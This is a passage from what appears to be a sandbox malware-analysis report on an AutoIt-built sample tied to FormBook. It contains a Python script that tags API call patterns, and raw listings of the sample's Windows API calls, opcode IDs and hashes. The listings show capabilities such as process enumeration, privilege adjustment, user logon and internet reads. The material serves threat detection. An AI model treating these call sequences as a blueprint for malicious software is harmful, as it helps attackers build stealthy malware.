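    return [int(t, 16) if re.fullmatch(r"[0-9A-Fa-f]+", t) else None for t in raw.split(",")]


def parse_listing(text: str) -> List[Block]:
    """Split the listing at every 'APIs' header and collect calls and metadata per block."""
    blocks: List[Block] = []
    cur: Optional[Block] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = Block()
            blocks.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            cur.calls.append(Call(m["name"], m["module"], _parse_args(m["args"]), m["ref"].upper(), m["sub"]))
            continue
        m = META_RE.match(line)
        if m:
            cur.meta[m["key"].strip()] = m["val"].strip()
    return blocks


def classify(block: Block) -> List[str]:
    """Tag a block with the behaviours its call sequence and strings reveal (tag names are mine)."""
    present = {c.name for c in block.calls}
    strings = block.meta.get("String ID", "")
    tags: List[str] = []
    for c in block.calls:
        if c.name == "socket" and len(c.args) >= 2:
            if c.args[1] == 1 and {"bind", "listen"} <= present:  # SOCK_STREAM + bind + listen
                tags.append("tcp_listener")
            elif c.args[1] == 2 and "bind" in present:  # SOCK_DGRAM + bind
                tags.append("udp_bind")
    if "ExitWindowsEx" in present and "SeShutdownPrivilege" in strings:
        tags.append("shutdown_with_privilege")
    token_calls = [c for c in block.calls
                   if c.name == "GetTokenInformation" and len(c.args) > 1 and c.args[1] == 2]  # TokenGroups
    if token_calls:
        tags.append("token_groups_query")
        if len(token_calls) == 2 and {"GetLastError", "HeapAlloc"} <= present:
            tags.append("two_call_buffer_sizing")  # size query, allocate, query again
    if {"FindFirstFileW", "FindNextFileW"} <= present:
        tags.append("directory_enumeration")
    if "CoCreateInstance" in present and ".lnk" in strings:
        tags.append("com_with_lnk_string")
    return tags


def triage(text: str) -> Dict[str, List[str]]:
    """Map each block's Opcode ID (or its first ref when no ID is present) to its tags."""
    out: Dict[str, List[str]] = {}
    for b in parse_listing(text):
        key = b.meta.get("Opcode ID") or (b.calls[0].ref if b.calls else "?")
        out[key] = classify(b)
    return out


if __name__ == "__main__":
    for opcode_id, tags in triage(SAMPLE).items():
        print(opcode_id[:16], tags)
```

Pasting the whole "APIs" listing of a report into `triage` gives one tag list per function keyed by Opcode ID, which is stable across samples built from the same code and so lets the same function be recognised in other reports. Tags describe what the call sequence does, not intent: the AutoIt runtime this binary embeds legitimately contains listener, shutdown and token-query helpers, and the report's own signature list above is what ties this sample to FormBook.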
APIs
• CoInitialize.OLE32(00000000), ref: 0052C432
• CoCreateInstance.OLE32(00552D6C,00000000,00000001,00552BDC,?), ref: 0052C44A
  • Part of subcall function 004C7DE1: _memmove.LIBCMT ref: 004C7E22
• CoUninitialize.OLE32 ref: 0052C6B7
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: CreateInitializeInstanceUninitialize_memmove
• String ID: .lnk
• API String ID: 2683427295-24824748
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,004C4AD0), ref: 004C4B45
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 004C4B57
Strings
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetNativeSystemInfo$kernel32.dll
• API String ID: 2574300362-192647395
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 0053EE3D
• Process32FirstW.KERNEL32(00000000,?), ref: 0053EE4B
  • Part of subcall function 004C7DE1: _memmove.LIBCMT ref: 004C7E22
• Process32NextW.KERNEL32(00000000,?), ref: 0053EF0B
• CloseHandle.KERNEL32(00000000,?,?,?), ref: 0053EF1A
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
• String ID:
• API String ID: 2576544623-0
APIs
• lstrlenW.KERNEL32(?,?,?,00000000), ref: 0051E628
Strings
Similarity
• API ID: lstrlen
• String ID: ($|
• API String ID: 1659193697-1631851259
APIs
• InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0053180A,00000000), ref: 005323E1
• InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00532418
Similarity
• API ID: Internet$AvailableDataFileQueryRead
• String ID:
• API String ID: 599397726-0
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0052B343
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0052B39D
• SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0052B3EA
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID:
• API String ID: 1682464887-0
APIs
  • Part of subcall function 004E0DB6: std::exception::exception.LIBCMT ref: 004E0DEC
  • Part of subcall function 004E0DB6: __CxxThrowException@8.LIBCMT ref: 004E0E01
• LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0051882B
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00518858
• GetLastError.KERNEL32 ref: 00518865
Similarity
• API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
• String ID:
• API String ID: 1922334811-0
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00518774
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0051878B
• FreeSid.ADVAPI32(?), ref: 0051879B
Similarity
• API ID: AllocateCheckFreeInitializeMembershipToken
• String ID:
• API String ID: 3429775523-0
APIs
• __time64.LIBCMT ref: 0052889B
  • Part of subcall function 004E520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00528F6E,00000000,?,?,?,?,0052911F,00000000,?), ref: 004E5213
  • Part of subcall function 004E520A: __aulldiv.LIBCMT ref: 004E5233
Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                      • String ID: 0eX
                                                                                                                      • API String ID: 2893107130-2786097830
                                                                                                                      • Opcode ID: 4cc0fb6abe095add3f19e60602d369d11797c6d9af6e430fb6db677655725d7d
                                                                                                                      • Instruction ID: 3ac65d23955048dbdb58852a22fa35ce9842fef8d76719f816e49b6217a7e957
                                                                                                                      • Opcode Fuzzy Hash: 4cc0fb6abe095add3f19e60602d369d11797c6d9af6e430fb6db677655725d7d
                                                                                                                      • Instruction Fuzzy Hash: A421B4326355208BC729CF65E841A62B7E1EFA5311F688E6CD5F5CB2C0CA34B905DB94
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0052C6FB
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0052C72B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2295610775-0
                                                                                                                      • Opcode ID: 9c310aa8041a7384849ab79d86718581b61a90acb739ec216b88273a5e1e6097
                                                                                                                      • Instruction ID: fcb8d0e714a929a96075d21105267c29c94570731ad09fec3cfb5d821cba260e
                                                                                                                      • Opcode Fuzzy Hash: 9c310aa8041a7384849ab79d86718581b61a90acb739ec216b88273a5e1e6097
                                                                                                                      • Instruction Fuzzy Hash: 2B1182766106009FDB10EF29D849A6AFBE5FF85324F04851EF9A587291DB34AC05CB91
                                                                                                                      APIs
                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00539468,?,0054FB84,?), ref: 0052A097
                                                                                                                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00539468,?,0054FB84,?), ref: 0052A0A9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFormatLastMessage
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3479602957-0
                                                                                                                      • Opcode ID: 9011280d16efd588a72922739baf798ae37e987c80c5c47b4ba96b3b42a97364
                                                                                                                      • Instruction ID: 144f45acf051ba7d24012ba7e65bfcc86a5837eea9f0776c31f43c26aba79c10
                                                                                                                      • Opcode Fuzzy Hash: 9011280d16efd588a72922739baf798ae37e987c80c5c47b4ba96b3b42a97364
                                                                                                                      • Instruction Fuzzy Hash: 79F0823910522DABDB219FA4DC48FEA776CBF09361F00826AF909D6191D6709944DBA1
                                                                                                                      APIs
                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00518309), ref: 005181E0
                                                                                                                      • CloseHandle.KERNEL32(?,?,00518309), ref: 005181F2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 81990902-0
                                                                                                                      • Opcode ID: 16df5e21263656737c9986d20a9e72aa48aed0c7d01a59ab5fc022ca15775218
                                                                                                                      • Instruction ID: 54c740ad3d3c2b23b440c3a495a98c7a7d0827ad6706d045cbe3482383a2eda8
                                                                                                                      • Opcode Fuzzy Hash: 16df5e21263656737c9986d20a9e72aa48aed0c7d01a59ab5fc022ca15775218
                                                                                                                      • Instruction Fuzzy Hash: 0BE0E676010510AFE7252B65EC09DB77BE9EF04315714883DF46684470DB615CD1DB14
                                                                                                                      APIs
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,004E8D57,?,?,?,00000001), ref: 004EA15A
                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 004EA163
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3192549508-0
                                                                                                                      • Opcode ID: ee9dd34dc35528440dcc12e50256695b35c5424be287ad7e2734e15cc82e5933
                                                                                                                      • Instruction ID: fdb532cb1db8e05c17302287773394e68cc19f69fdb0df8f686c242c1eabcc01
                                                                                                                      • Opcode Fuzzy Hash: ee9dd34dc35528440dcc12e50256695b35c5424be287ad7e2734e15cc82e5933
                                                                                                                      • Instruction Fuzzy Hash: 26B09235054208ABCA002F99EC09FC83F68EB56AAAF404420F60D84060CB625454AB91
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: fc2091cc1174aff9be6837b13608232af8e82fe79d6f669d4b61fde63bed3d05
                                                                                                                      • Instruction ID: 31caee5208f23f6a1793735abbec37905d6ecf289654cefb4a51538d3cb1c7a8
                                                                                                                      • Opcode Fuzzy Hash: fc2091cc1174aff9be6837b13608232af8e82fe79d6f669d4b61fde63bed3d05
                                                                                                                      • Instruction Fuzzy Hash: 65325422D29F454DD7239635D832336A288AFB73D6F15C737F81AB5AA6EB28C4C75100
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 60914b9e86bc6cc729c8a8764076f56fd3ee5f725a04018d84e27811c4360dda
                                                                                                                      • Instruction ID: e4613f271ee6964c381a7e163710d65c104a586dc76a50862cd6ebb4d09c50f2
                                                                                                                      • Opcode Fuzzy Hash: 60914b9e86bc6cc729c8a8764076f56fd3ee5f725a04018d84e27811c4360dda
                                                                                                                      • Instruction Fuzzy Hash: 90B10120E2AF414DD72396398831336BB5CAFBB2DAF52D71BFC2674D22EB2185875141
                                                                                                                      APIs
                                                                                                                      • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00524C76
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: mouse_event
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2434400541-0
                                                                                                                      • Opcode ID: 4aff6d65de7b9abc503e1f289797f75929e699da2dfc79a759e0ba87e8d07430
                                                                                                                      • Instruction ID: 63ded8ba5eb91a75f56178def1605ceea02994fa8e9de88202f9962b746fffb5
                                                                                                                      • Opcode Fuzzy Hash: 4aff6d65de7b9abc503e1f289797f75929e699da2dfc79a759e0ba87e8d07430
                                                                                                                      • Instruction Fuzzy Hash: 34D05EF412223939EE280728BD4FFBA1909FBC3781F84854A7241A50C0E8E09C00AC34
                                                                                                                      APIs
                                                                                                                      • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00518389), ref: 005187D1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LogonUser
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1244722697-0
                                                                                                                      • Opcode ID: d3a24c673fa60dc59dd8668c654fa2c24a131c72b8ae38701b1f166e6f499723
                                                                                                                      • Instruction ID: 80a9809c24e1aeaed046ec37a6a8b41fbec38532bfcc1174e6c4a9ce1881f18b
                                                                                                                      • Opcode Fuzzy Hash: d3a24c673fa60dc59dd8668c654fa2c24a131c72b8ae38701b1f166e6f499723
                                                                                                                      • Instruction Fuzzy Hash: 65D05E3226050EABEF018EA8DC05EEF3B69EB04B01F408111FE16C50A1C775D835AB60
                                                                                                                      APIs
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(?), ref: 004EA12A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3192549508-0
                                                                                                                      • Opcode ID: 50642689c7bb80e1f3f1cd44c24b1ead039e97b4d951b70b1b19d425fa3f6aba
                                                                                                                      • Instruction ID: 4ba0961fea47214fb8ba1df9e529503da3fab4e27ffd95b44dcfc3bbd46e9af9
                                                                                                                      • Opcode Fuzzy Hash: 50642689c7bb80e1f3f1cd44c24b1ead039e97b4d951b70b1b19d425fa3f6aba
                                                                                                                      • Instruction Fuzzy Hash: F5A0123000010CA78A001F45EC048847F5CD6015947004020F40C40021873254105680
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1233dfd3823ff1aa1a855e69bbe255c76e73774195ccb5382a9bfe1a5318e397
                                                                                                                      • Instruction ID: 94b1e5f90735a63b5da001a4cd3bd70d9e1c51354bb748d0dd37d5353f964940
                                                                                                                      • Opcode Fuzzy Hash: 1233dfd3823ff1aa1a855e69bbe255c76e73774195ccb5382a9bfe1a5318e397
                                                                                                                      • Instruction Fuzzy Hash: 3B225730604106CBEF389B64C0B47BD7BA1FB81304F68846FD4968B792EB789EC1D646
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                      • Instruction ID: 3d0e6c213e687ab9ba43d8103cd2284b93c944e31fe9a6eee3070adbd0d71f0e
                                                                                                                      • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                      • Instruction Fuzzy Hash: 64C173322050D30ADB2D473B893443FBAA55FA27B231A075FD8B3CB2D4EE68D965D614
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                      • Instruction ID: f20e1729f29a849329519bbc431ad2e2c0f4fa931855a8d30194b653da0f2ea1
                                                                                                                      • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                      • Instruction Fuzzy Hash: 0FC1B5322050D30ADB2D473B893443FBAA55FA27B231A076FD4B2DB2D4EE28D975D614
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                      • Instruction ID: e03eabf31862ddab4332bf201820cb1c95a7c776cf7f95d6b683a1f4eba65b58
                                                                                                                      • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                      • Instruction Fuzzy Hash: ECC172322451D309DB2D463B883453FBAA15FA27B231A076ED4B2CB2E4EE38D9659614
                                                                                                                      APIs
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0053785B
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0053786D
                                                                                                                      • DestroyWindow.USER32 ref: 0053787B
                                                                                                                      • GetDesktopWindow.USER32 ref: 00537895
                                                                                                                      • GetWindowRect.USER32(00000000), ref: 0053789C
                                                                                                                      • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 005379DD
                                                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 005379ED
                                                                                                                      • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00537A35
                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 00537A41
                                                                                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00537A7B
                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00537A9D
                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00537AB0
                                                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00537ABB
                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00537AC4
                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00537AD3
                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00537ADC
